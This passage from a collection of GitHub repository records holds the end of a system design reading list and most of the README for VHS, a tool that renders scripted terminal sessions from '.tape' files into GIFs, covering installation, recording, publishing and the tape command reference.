- [What is HTTP](https://engineering.cred.club/head-of-line-hol-blocking-in-http-1-and-http-2-50b24e9e3372) - [QUIC Protocol](https://www.akamai.com/blog/performance/http3-and-quic-past-present-and-future) - [TCP Protocol algorithms](https://ee.lbl.gov/papers/congavoid.pdf) (First 10 pages 
are important) - [WebRTC](https://webrtc.github.io/webrtc-org/blog/2012/07/23/a-great-introduction-to-webrtc.html) - [WebSockets](https://datatracker.ietf.org/doc/html/rfc6455#section-1.2) - [Dynamic Source Routing using QUIC](https://fb.watch/fSEbI4KHlA/) ## ## Chess Engine Design - [Chess Engine Building](https://www.youtube.com/watch?v=U4ogK0MIzqk) ## ## Subscription Management System - [Subscription Manager](https://netflixtechblog.com/building-a-rule-based-platform-to-manage-netflix-membership-skus-at-scale-e3c0f82aa7bc) ## ## Google Docs - [Operational Transform](http://www.codecommit.com/blog/java/understanding-and-applying-operational-transformation) - [Google Docs](https://www.youtube.com/watch?v=uOFzWZrsPV0&list=PLX) - [Lumiere](https://www.arxiv.org/abs/2401.12945) ## ## API Design - [API Design at Airbnb](https://medium.com/airbnb-engineering/building-services-at-airbnb-part-1-c4c1d8fa811b) - [Swagger APIs](https://swagger.io/docs/specification/about/) ## ## NoSQL Database Internals - [Cassandra Architecture](https://docs.datastax.com/en/archived/cassandra/3.0/cassandra/architecture/archIntro.html) - [Google BigTable Architecture](https://static.googleusercontent.com/media/research.google.com/en//archive/bigtable-osdi06.pdf) - [Amazon Dynamo DB Internals](https://www.allthingsdistributed.com/2007/10/amazons_dynamo.html) - [Design Patterns in Amazon Dynamo DB](https://www.youtube.com/watch?v=HaEPXoXVf2k) - [Internals of Amazon Dynamo DB](https://www.youtube.com/watch?v=yvBR71D0nAQ) ## ## NoSQL Database Algorithms - [Hyperloglog Algorithm](https://odino.org/my-favorite-data-structure-hyperloglog/) - [Log Structured Merge Tree](https://www.cs.umb.edu/~poneil/lsmtree.pdf) - [Sorted String Tables and Compaction Strategies](https://github.com/scylladb/scylla/wiki/SSTable-compaction-and-compaction-strategies) - [Leveled Compaction Cassandra](https://www.datastax.com/blog/leveled-compaction-apache-cassandra) - [Scylla DB Compaction](https://github.com/scylladb/scylla/wiki/SSTable-compaction-and-compaction-strategies) - [Indexing in Cassandra](https://www.bmc.com/blogs/cassandra-clustering-columns-partition-composite-key/) ## ## Database Replication - [Database replication](https://dev.mysql.com/doc/refman/8.0/en/replication.html) - [Netflix Data replication - Change Data Capture](https://netflixtechblog.com/dblog-a-generic-change-data-capture-framework-69351fb9099b) - [LinkedIn Logging Usecases](https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying) - [Uber Trillions of indexes in LedgerStore](https://www.uber.com/en-IN/blog/how-ledgerstore-supports-trillions-of-indexes) ## ## Containers and Docker - [Facebook Twine Containerization](https://engineering.fb.com/developer-tools/zookeeper-twine/) - [CloudFlare Containerization](https://blog.cloudflare.com/cloud-computing-without-containers/) - [Docker Architecture](https://docs.docker.com/get-started/overview/#docker-architecture) ## ## Capacity Estimation - [Google Capacity Estimation](https://www.youtube.com/watch?v=modXC5IWTJI) - [Scalability at YouTube 2012](https://www.youtube.com/watch?v=G-lGCC4KKok) - [Back of envelope Calculations at AWS](https://www.youtube.com/watch?v=-3qetLv2Yp0) - [Capacity Estimation](http://static.googleusercontent.com/media/research.google.com/en//people/jeff/stanford-295-talk.pdf) ## ## Publisher Subscriber - [Oracle Publisher Subscriber](https://docs.oracle.com/cd/B10501_01/appdev.920/a96590/adg15pub.htm) - [Amazon Pub Sub 
Messaging](https://aws.amazon.com/pub-sub-messaging/) - [Asynchronous processing](http://blog.codepath.com/2013/01/06/asynchronous-processing-in-web-applications-part-2-developers-need-to-understand-message-queues/) - [Async Request Response](https://www.enterpriseintegrationpatterns.com/patterns/conversation/RequestResponse.html) ## ## Event Driven Architectures - [Martin Fowler - Event Driven Architecture](https://www.youtube.com/watch?v=STKCRSUsyP0) - [Event Driven Architecture](https://martinfowler.com/articles/201701-event-driven.html) ## ## Software Architectures - [Hexagonal Architecture](https://netflixtechblog.com/ready-for-changes-with-hexagonal-architecture-b315ec967749) - [Hexagonal architecture (Alistair Cockburn)](https://alistair.cockburn.us/hexagonal-architecture/) - [The Clean Architecture by Robert C. Martin (Uncle Bob)](https://blog.cleancoder.com/uncle-bob/2012/08/13/the-clean-architecture.html) - [CQRS](https://martinfowler.com/bliki/CQRS.html) - [DomainDrivenDesign](https://martinfowler.com/bliki/DomainDrivenDesign.html) ## ## Microservices - [Monolith Architecture](https://buttercms.com/books/microservices-for-startups/should-you-always-start-with-a-monolith/) - [Monoliths vs Microservices](https://articles.microservices.com/monolithic-vs-microservices-architecture-5c4848858f59) - [Microservices](http://highscalability.com/blog/2018/4/5/do-you-have-too-many-microservices-five-design-attributes-th.html) - [Uber Nanoservices antipattern](https://www.youtube.com/watch?v=kb-m2fasdDY) - [Uber Domain oriented microservice](https://eng.uber.com/microservice-architecture/) ## ## Distributed Transactions consistency Patterns - [Transactional outbox](https://microservices.io/patterns/data/transactional-outbox.html) - [SAGAS Long lived transactions (LLTs)](https://www.cs.cornell.edu/andru/cs711/2002fa/reading/sagas.pdf) ## ## Load Balancing - [Load Balancer with Sticky Sessions](https://stackoverflow.com/questions/10494431/sticky-and-non-sticky-sessions) - [NetScaler what is load balancing](https://www.netscaler.com/articles/what-is-load-balancing) - [Nginx Load Balancing](https://www.nginx.com/resources/glossary/load-balancing/) - [Consistent hashing](https://michaelnielsen.org/blog/consistent-hashing/) ## ## Alerts and Anomaly Detection - [Outlier Detection](https://towardsdatascience.com/outlier-detection-with-isolation-forest-3d190448d45e) - [Anomaly Detection](https://towardsdatascience.com/machine-learning-for-anomaly-detection-and-condition-monitoring-d4614e7de770) - [Uber Real Time Monitoring and Root Cause Analysis Argos](https://eng.uber.com/argos-real-time-alerts/) - [Microsoft Anomaly Detection](https://www.youtube.com/watch?v=12Xq9OLdQwQ&t=0s) - [Facebook Data Engineering](https://engineering.fb.com/2016/05/09/core-data/introducing-fblearner-flow-facebook-s-ai-backbone/) - [LinkedIn Real Time Alerting](https://engineering.linkedin.com/blog/2019/06/smart-alerts-in-thirdeye--linkedins-real-time-monitoring-platfor) - [LinkedIn Isolation Forests](https://engineering.linkedin.com/blog/2019/isolation-forest) ## ## Distributed Logging - [Uber Distributed Request Tracing](https://eng.uber.com/distributed-tracing/) - [Pinterest Logging](https://medium.com/@Pinterest_Engineering/open-sourcing-singer-pinterests-performant-and-reliable-logging-agent-610fecf35566) - [Google Monitoring Infrastructure](https://www.facebook.com/atscaleevents/videos/959344524420015/) ## ## Metrics and Text Search Engine - [Facebook real-time text search engine](https://www.facebook.com/watch/?v=432864835468) 
- [Elastic Search Time Based Querying](https://www.elastic.co/guide/en/elasticsearch/guide/current/time-based.html) - [Elastic Search Aggregation](https://www.elastic.co/guide/en/elasticsearch/guide/current/aggregations.html) ## ## Single Point of Failure - [Avoiding Single Points of Failure](https://medium.com/the-cloud-architect/patterns-for-resilient-architecture-part-3-16e8601c488e) - [Netflix Multi-Region Availability](https://netflixtechblog.com/active-active-for-multi-regional-resiliency-c47719f6685b) - [Oracle Single Points of failure](https://docs.oracle.com/cd/E19693-01/819-0992/fjdch/index.html) - [DNS single point of failure 2004](http://www.tenereillo.com/GSLBPageOfShame.htm) - [DNS traffic management by Shopify](https://shopify.engineering/introduction-dns-traffic-management) - [Sharding](https://medium.com/@jeeyoungk/how-sharding-works-b4dec46b3f6) ## ## Location Based Services - [Google S2 library](https://blog.christianperone.com/2015/08/googles-s2-geometry-on-the-sphere-cells-and-hilbert-curve/) ## ## Batch Processing - [Map Reduce Architecture](https://static.googleusercontent.com/media/research.google.com/en//archive/mapreduce-osdi04.pdf) ## ## Real Time Stream Processing - [LinkedIn Brooklin - Real-time data streaming](https://engineering.linkedin.com/blog/2019/brooklin-open-source) - [Netflix Real Time Stream Processing](https://netflixtechblog.com/keystone-real-time-stream-processing-platform-a3ee651812a) - [KSQLDB for Kafka](https://docs.ksqldb.io/en/latest/operate-and-deploy/how-it-works/) - [Netflix Psyberg](https://netflixtechblog.com/1-streamlining-membership-data-engineering-at-netflix-with-psyberg-f68830617dd1) ## ## Caching - [Google Guava Cache](https://github.com/google/guava/wiki/CachesExplained) - [Caching (See the README)](https://github.com/ben-manes/caffeine/) - [Caching](http://highscalability.com/blog/2016/1/25/design-of-a-modern-cache.html) - [Microsoft Caching Guide](https://docs.microsoft.com/en-us/previous-versions/msp-n-p/dn589802(v%3dpandp.10)) - [Caching patterns](https://hazelcast.com/blog/a-hitchhikers-guide-to-caching-patterns/) ## ## Distributed Consensus - [Paxos](http://ifeanyi.co/posts/understanding-consensus/) - [Raft](https://raft.github.io/) ## ## Authorization - [Designing an Authorization Model for an Enterprise](https://cerbos.dev/blog/designing-an-authorization-model-for-an-enterprise) - [The Architectural Patterns of Cloud-native Authorization Systems](https://www.aserto.com/blog/5-laws-cloud-native-authorization) ## ## Content Delivery Network - [AWS CloudFront CDN with S3](https://aws.amazon.com/blogs/networking-and-content-delivery/amazon-s3-amazon-cloudfront-a-match-made-in-the-cloud/) ## ## Testing Distributed Systems - [Deterministic Testing](https://www.youtube.com/watch?v=4fFDFbi3toc) - [TLA+ by Leslie Lamport](https://lamport.azurewebsites.net/tla/tla.html) - [Jepsen](https://jepsen.io) ## ## System Design Resources - [Designing Data-Intensive Applications Book](https://amzn.to/3SyNAOy) - [WhitePapers](https://interviewready.io/blog/white-papers-worth-reading-for-software-engineers) - [InterviewReady Videos](https://interviewready.io?source=github) - [System Design Online Judge](https://interviewready.io/question-list/system-design-judge)
These are the best resources for System Design on the Internet
cache,fault-tolerance,scalability,system-design
0
12
20
74
0
1
1
charmbracelet/vhs
# VHS <p> <img src="https://user-images.githubusercontent.com/42545625/198402537-12ca2f6c-0779-4eb8-a67c-8db9cb3df13c.png#gh-dark-mode-only" width="500" /> <img src="https://user-images.githubusercontent.com/42545625/198402542-a305f669-a05a-4d91-b18b-ca76e72b655a.png#gh-light-mode-only" width="500" /> <br> <a href="https://github.com/charmbracelet/vhs/releases"><img src="https://img.shields.io/github/release/charmbracelet/vhs.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/vhs?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="Go Docs"></a> <a href="https://github.com/charmbracelet/vhs/actions"><img src="https://github.com/charmbracelet/vhs/workflows/build/badge.svg" alt="Build Status"></a> </p> Write terminal GIFs as code for integration testing and demoing your CLI tools. <img alt="Welcome to VHS" src="https://stuff.charm.sh/vhs/examples/neofetch_3.gif" width="600" /> The above example was generated with VHS ([view source](./examples/neofetch/neofetch.tape)). ## Tutorial To get started, [install VHS](#installation) and create a new `.tape` file. ```sh vhs new demo.tape ``` Open the `.tape` file with your favorite `$EDITOR`. ```sh vim demo.tape ``` Tape files consist of a series of [commands](#vhs-command-reference). The commands are instructions for VHS to perform on its virtual terminal. For a list of all possible commands see [the command reference](#vhs-command-reference). ```elixir # Where should we write the GIF? Output demo.gif # Set up a 1200x600 terminal with 46px font. Set FontSize 46 Set Width 1200 Set Height 600 # Type a command in the terminal. Type "echo 'Welcome to VHS!'" # Pause for dramatic effect... Sleep 500ms # Run the command by pressing enter. Enter # Admire the output for a bit. Sleep 5s ``` Once you've finished, save the file and feed it into VHS. ```sh vhs demo.tape ``` All done! You should see a new file called `demo.gif` (or whatever you named the `Output`) in the directory. <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/demo.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/demo.gif"> <img width="600" alt="A GIF produced by the VHS code above" src="https://stuff.charm.sh/vhs/examples/demo.gif"> </picture> For more examples see the [`examples/`](https://github.com/charmbracelet/vhs/tree/main/examples) directory. ## Installation > [!NOTE] > VHS requires [`ttyd`](https://github.com/tsl0922/ttyd) and [`ffmpeg`](https://ffmpeg.org) to be installed and available on your `PATH`. 
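Before rendering, it can help to confirm that both dependencies actually resolve; a minimal shell sketch (not part of VHS itself):

```bash
# Fail fast if ttyd or ffmpeg is missing from $PATH.
for dep in ttyd ffmpeg; do
  command -v "$dep" >/dev/null 2>&1 || echo "missing dependency: $dep" >&2
done
```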
Use a package manager: ```sh # macOS or Linux brew install vhs # Arch Linux (btw) pacman -S vhs # Nix nix-env -iA nixpkgs.vhs # Windows using scoop scoop install vhs ``` Or, use Docker to run VHS directly, dependencies included: ```sh docker run --rm -v $PWD:/vhs ghcr.io/charmbracelet/vhs <cassette>.tape ``` Or, download it: * [Packages][releases] are available in Debian and RPM formats * [Binaries][releases] are available for Linux, macOS, and Windows Or, just install it with `go`: ```sh go install github.com/charmbracelet/vhs@latest ``` <details> <summary>Windows, Debian, Ubuntu, Fedora, RHEL, Void Instructions</summary> * Debian / Ubuntu ```sh # Debian/Ubuntu sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list # Install ttyd from https://github.com/tsl0922/ttyd/releases sudo apt update && sudo apt install vhs ffmpeg ``` * Fedora / RHEL ```sh echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo # Install ttyd from https://github.com/tsl0922/ttyd/releases sudo yum install vhs ffmpeg ``` * Void ```sh sudo xbps-install vhs ``` * Windows ```sh winget install charmbracelet.vhs # or scoop scoop install vhs ``` </details> [releases]: https://github.com/charmbracelet/vhs/releases ## Record Tapes VHS has the ability to generate tape files from your terminal actions! To record to a tape file, run: ```bash vhs record > cassette.tape ``` Perform any actions you want and then `exit` the terminal session to stop recording. You may want to manually edit the generated `.tape` file to add settings or modify actions. Then, you can generate the GIF: ```bash vhs cassette.tape ``` ## Publish Tapes VHS allows you to publish your GIFs to our servers for easy sharing with your friends and colleagues. Specify which file you want to share, then use the `publish` sub-command to host it on `vhs.charm.sh`. The output will provide you with links to share your GIF via browser, HTML, and Markdown. ```bash vhs publish demo.gif ``` ## The VHS Server VHS has an SSH server built in! When you self-host VHS you can access it as though it were installed locally. VHS will have access to commands and applications on the host, so you don't need to install them on your machine. To start the server run: ```sh vhs serve ``` <details> <summary>Configuration Options</summary> * `VHS_PORT`: The port to listen on (`1976`) * `VHS_HOST`: The host to listen on (`localhost`) * `VHS_GID`: The Group ID to run the server as (current user's GID) * `VHS_UID`: The User ID to run the server as (current user's UID) * `VHS_KEY_PATH`: The path to the SSH key to use (`.ssh/vhs_ed25519`) * `VHS_AUTHORIZED_KEYS_PATH`: The path to the authorized keys file (empty, publicly accessible) </details> Then, simply access VHS from a different machine via `ssh`: ```sh ssh vhs.example.com < demo.tape > demo.gif ``` ## VHS Command Reference > [!NOTE] > You can view all VHS documentation on the command line with `vhs manual`. 
There are a few basic types of VHS commands: * [`Output <path>`](#output): specify file output * [`Require <program>`](#require): specify required programs for tape file * [`Set <Setting> Value`](#settings): set recording settings * [`Type "<characters>"`](#type): emulate typing * [`Left`](#arrow-keys) [`Right`](#arrow-keys) [`Up`](#arrow-keys) [`Down`](#arrow-keys): arrow keys * [`Backspace`](#backspace) [`Enter`](#enter) [`Tab`](#tab) [`Space`](#space): special keys * [`Ctrl[+Alt][+Shift]+<char>`](#ctrl): press control + key and/or modifier * [`Sleep <time>`](#sleep): wait for a certain amount of time * [`Hide`](#hide): hide commands from output * [`Show`](#show): stop hiding commands from output * [`Screenshot`](#screenshot): screenshot the current frame * [`Copy/Paste`](#copy--paste): copy and paste text from the clipboard * [`Source`](#source): source commands from another tape * [`Env <Key> Value`](#env): set environment variables ### Output The `Output` command allows you to specify the location and file format of the render. You can specify more than one output in a tape file which will render them to the respective locations. ```elixir Output out.gif Output out.mp4 Output out.webm Output frames/ # a directory of frames as a PNG sequence ``` ### Require The `Require` command allows you to specify dependencies for your tape file. These are useful for failing early when a required program is missing from the `$PATH` and the VHS run is certain not to work as expected. Require commands must be defined at the top of a tape file, before any non-setting or non-output command. ```elixir # A tape file that requires gum and glow to be in the $PATH Require gum Require glow ``` ### Settings The `Set` command allows you to change global aspects of the terminal, such as the font settings, window dimensions, and GIF output location. Settings must be declared at the top of the tape file. Any setting (except `TypingSpeed`) applied after a non-setting or non-output command will be ignored. #### Set Shell Set the shell with the `Set Shell <shell>` command ```elixir Set Shell fish ``` #### Set Font Size Set the font size with the `Set FontSize <number>` command. 
```elixir
Set FontSize 10
Set FontSize 20
Set FontSize 40
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-size-10.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-size-10.gif">
  <img width="600" alt="Example of setting the font size to 10 pixels" src="https://stuff.charm.sh/vhs/examples/font-size-10.gif">
</picture>

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-size-20.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-size-20.gif">
  <img width="600" alt="Example of setting the font size to 20 pixels" src="https://stuff.charm.sh/vhs/examples/font-size-20.gif">
</picture>

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-size-40.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-size-40.gif">
  <img width="600" alt="Example of setting the font size to 40 pixels" src="https://stuff.charm.sh/vhs/examples/font-size-40.gif">
</picture>

#### Set Font Family

Set the font family with the `Set FontFamily "<font>"` command.

```elixir
Set FontFamily "Monoflow"
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-family.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-family.gif">
  <img width="600" alt="Example of changing the font family to Monoflow" src="https://stuff.charm.sh/vhs/examples/font-family.gif">
</picture>

#### Set Width

Set the width of the terminal with the `Set Width` command.

```elixir
Set Width 300
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/width.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/width.gif">
  <img width="300" alt="Example of changing the width of the terminal" src="https://stuff.charm.sh/vhs/examples/width.gif">
</picture>

#### Set Height

Set the height of the terminal with the `Set Height` command.

```elixir
Set Height 1000
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/height.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/height.gif">
  <img width="300" alt="Example of changing the height of the terminal" src="https://stuff.charm.sh/vhs/examples/height.gif">
</picture>

#### Set Letter Spacing

Set the spacing between letters (tracking) with the `Set LetterSpacing` command.

```elixir
Set LetterSpacing 20
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/letter-spacing.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/letter-spacing.gif">
  <img width="600" alt="Example of changing the letter spacing to 20 pixels between characters" src="https://stuff.charm.sh/vhs/examples/letter-spacing.gif">
</picture>

#### Set Line Height

Set the spacing between lines with the `Set LineHeight` command.
```elixir
Set LineHeight 1.8
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/line-height.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/line-height.gif">
  <img width="600" alt="Example of changing the line height to 1.8" src="https://stuff.charm.sh/vhs/examples/line-height.gif">
</picture>

#### Set Typing Speed

```elixir
Set TypingSpeed 500ms # 500ms
Set TypingSpeed 1s    # 1s
```

Set the typing speed in seconds per key press. For example, a typing speed of `0.1` would result in a `0.1s` (`100ms`) delay between each character being typed. This setting can also be overridden per command with the `@<time>` syntax.

```elixir
Set TypingSpeed 0.1
Type "100ms delay per character"
Type@500ms "500ms delay per character"
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/typing-speed.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/typing-speed.gif">
  <img width="600" alt="Example of using the Type command in VHS" src="https://stuff.charm.sh/vhs/examples/typing-speed.gif">
</picture>

#### Set Theme

Set the theme of the terminal with the `Set Theme` command. The theme value should be a JSON string with the base 16 colors and foreground + background.

```elixir
Set Theme { "name": "Whimsy", "black": "#535178", "red": "#ef6487", "green": "#5eca89", "yellow": "#fdd877", "blue": "#65aef7", "magenta": "#aa7ff0", "cyan": "#43c1be", "white": "#ffffff", "brightBlack": "#535178", "brightRed": "#ef6487", "brightGreen": "#5eca89", "brightYellow": "#fdd877", "brightBlue": "#65aef7", "brightMagenta": "#aa7ff0", "brightCyan": "#43c1be", "brightWhite": "#ffffff", "background": "#29283b", "foreground": "#b3b0d6", "selection": "#3d3c58", "cursor": "#b3b0d6" }
```

<img alt="Example of changing the theme to Whimsy" src="https://stuff.charm.sh/vhs/examples/theme.gif" width="600" />

You can also set themes by name:

```elixir
Set Theme "Catppuccin Frappe"
```

See the full list by running `vhs themes`, or in [THEMES.md](./THEMES.md).

#### Set Padding

Set the padding (in pixels) of the terminal frame with the `Set Padding` command.

```elixir
Set Padding 0
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/padding.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/padding.gif">
  <img width="600" alt="Example of setting the padding" src="https://stuff.charm.sh/vhs/examples/padding.gif">
</picture>

#### Set Margin

Set the margin (in pixels) of the video with the `Set Margin` command.

```elixir
Set Margin 60
Set MarginFill "#6B50FF"
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-1miKMtNHenh7O4sv76TMwG.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-1miKMtNHenh7O4sv76TMwG.gif">
  <img width="600" alt="Example of setting the margin" src="https://vhs.charm.sh/vhs-1miKMtNHenh7O4sv76TMwG.gif">
</picture>

#### Set Window Bar

Set the type of window bar (Colorful, ColorfulRight, Rings, RingsRight) on the terminal window with the `Set WindowBar` command.
```elixir
Set WindowBar Colorful
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-4VgviCu38DbaGtbRzhtOUI.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-4VgviCu38DbaGtbRzhtOUI.gif">
  <img width="600" alt="Example of setting the window bar" src="https://vhs.charm.sh/vhs-4VgviCu38DbaGtbRzhtOUI.gif">
</picture>

#### Set Border Radius

Set the border radius (in pixels) of the terminal window with the `Set BorderRadius` command.

```elixir
# You'll likely want to add a Margin + MarginFill if you use BorderRadius.
Set Margin 20
Set MarginFill "#674EFF"
Set BorderRadius 10
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-4nYoy6IsUKmleJANG7N1BH.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-4nYoy6IsUKmleJANG7N1BH.gif">
  <img width="400" alt="Example of setting the border radius" src="https://vhs.charm.sh/vhs-4nYoy6IsUKmleJANG7N1BH.gif">
</picture>

#### Set Framerate

Set the rate at which VHS captures frames with the `Set Framerate` command.

```elixir
Set Framerate 60
```

#### Set Playback Speed

Set the playback speed of the final render.

```elixir
Set PlaybackSpeed 0.5 # Make output 2 times slower
Set PlaybackSpeed 1.0 # Keep output at normal speed (default)
Set PlaybackSpeed 2.0 # Make output 2 times faster
```

#### Set Loop Offset

Set the offset for when the GIF loop should begin. This allows you to make the first frame of the GIF (generally used for previews) more interesting.

```elixir
Set LoopOffset 5 # Start the GIF at the 5th frame
Set LoopOffset 50% # Start the GIF halfway through
```

#### Set Cursor Blink

Set whether the cursor should blink. Enabled by default.

```elixir
Set CursorBlink false
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-3rMCb80VEkaDdTOJMCrxKy.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-3rMCb80VEkaDdTOJMCrxKy.gif">
  <img width="600" alt="Example of setting the cursor blink." src="https://vhs.charm.sh/vhs-3rMCb80VEkaDdTOJMCrxKy.gif">
</picture>

### Type

Use `Type` to emulate key presses. That is, you can use `Type` to script typing in a terminal. Type is handy for both entering commands and interacting with prompts and TUIs in the terminal. The command takes a string argument of the characters to type.

You can set the standard typing speed with [`Set TypingSpeed`](#set-typing-speed) and override it in places with a `@time` argument.

```elixir
# Type something
Type "Whatever you want"

# Type something really slowly!
Type@500ms "Slow down there, partner."
```

Escape single and double quotes with backticks.

```elixir
Type `VAR="Escaped"`
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/type.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/type.gif">
  <img width="600" alt="Example of using the Type command in VHS" src="https://stuff.charm.sh/vhs/examples/type.gif">
</picture>

### Keys

Key commands take an optional `@time` and an optional repeat `count` for repeating the key press every interval of `<time>`.

```
Key[@<time>] [count]
```

#### Backspace

Press the backspace key with the `Backspace` command.
```elixir
Backspace 18
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/backspace.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/backspace.gif">
  <img width="600" alt="Example of pressing the Backspace key 18 times" src="https://stuff.charm.sh/vhs/examples/backspace.gif">
</picture>

#### Ctrl

You can access the control modifier and send control sequences with the `Ctrl` command.

```elixir
Ctrl+R
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/ctrl.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/ctrl.gif">
  <img width="600" alt="Example of pressing the Ctrl+R key to reverse search" src="https://stuff.charm.sh/vhs/examples/ctrl.gif">
</picture>

#### Enter

Press the enter key with the `Enter` command.

```elixir
Enter 2
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/enter.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/enter.gif">
  <img width="600" alt="Example of pressing the Enter key twice" src="https://stuff.charm.sh/vhs/examples/enter.gif">
</picture>

#### Arrow Keys

Press any of the arrow keys with the `Up`, `Down`, `Left`, `Right` commands.

```elixir
Up 2
Down 2
Left
Right
Left
Right
Type "B"
Type "A"
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/arrow.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/arrow.gif">
  <img width="600" alt="Example of pressing the arrow keys to navigate text" src="https://stuff.charm.sh/vhs/examples/arrow.gif">
</picture>

#### Tab

Enter a tab with the `Tab` command.

```elixir
Tab@500ms 2
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/tab.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/tab.gif">
  <img width="600" alt="Example of pressing the tab key twice for autocomplete" src="https://stuff.charm.sh/vhs/examples/tab.gif">
</picture>

#### Space

Press the space bar with the `Space` command.

```elixir
Space 10
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/space.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/space.gif">
  <img width="600" alt="Example of pressing the space key" src="https://stuff.charm.sh/vhs/examples/space.gif">
</picture>

#### Page Up / Down

Press the Page Up / Down keys with the `PageUp` or `PageDown` commands.

```elixir
PageUp 3
PageDown 5
```

### Sleep

The `Sleep` command allows you to continue capturing frames without interacting with the terminal. This is useful when you need to wait on something to complete while including it in the recording, like a spinner or loading state. The command takes a duration argument: a bare number is interpreted as seconds, and `ms`/`s` units are also accepted.

```elixir
Sleep 0.5   # 500ms
Sleep 2     # 2s
Sleep 100ms # 100ms
Sleep 1s    # 1s
```

### Hide

The `Hide` command instructs VHS to stop capturing frames. It's useful to pause a recording to perform hidden commands.

```elixir
Hide
```

This command is helpful for performing any setup and cleanup required to record a GIF, such as building the latest version of a binary and removing the binary once the demo is recorded.

```elixir
Output example.gif

# Setup
Hide
Type "go build -o example . && clear"
Enter
Show

# Recording...
Type 'Running ./example'
...
Enter

# Cleanup
Hide
Type 'rm example'
```

### Show

The `Show` command instructs VHS to begin capturing frames again. It's useful after a `Hide` command to resume frame recording for the output.

```elixir
Hide
Type "You won't see this being typed."
Show
Type "You will see this being typed."
```

<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/hide.gif">
  <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/hide.gif">
  <img width="600" alt="Example of typing something while hidden" src="https://stuff.charm.sh/vhs/examples/hide.gif">
</picture>

### Screenshot

The `Screenshot` command captures the current frame (PNG format).

```elixir
# At any point...
Screenshot examples/screenshot.png
```

### Copy / Paste

The `Copy` and `Paste` commands copy and paste text via the clipboard.

```elixir
Copy "https://github.com/charmbracelet"
Type "open "
Sleep 500ms
Paste
```

### Env

The `Env` command sets an environment variable as a key-value pair.

```elixir
Env HELLO "WORLD"

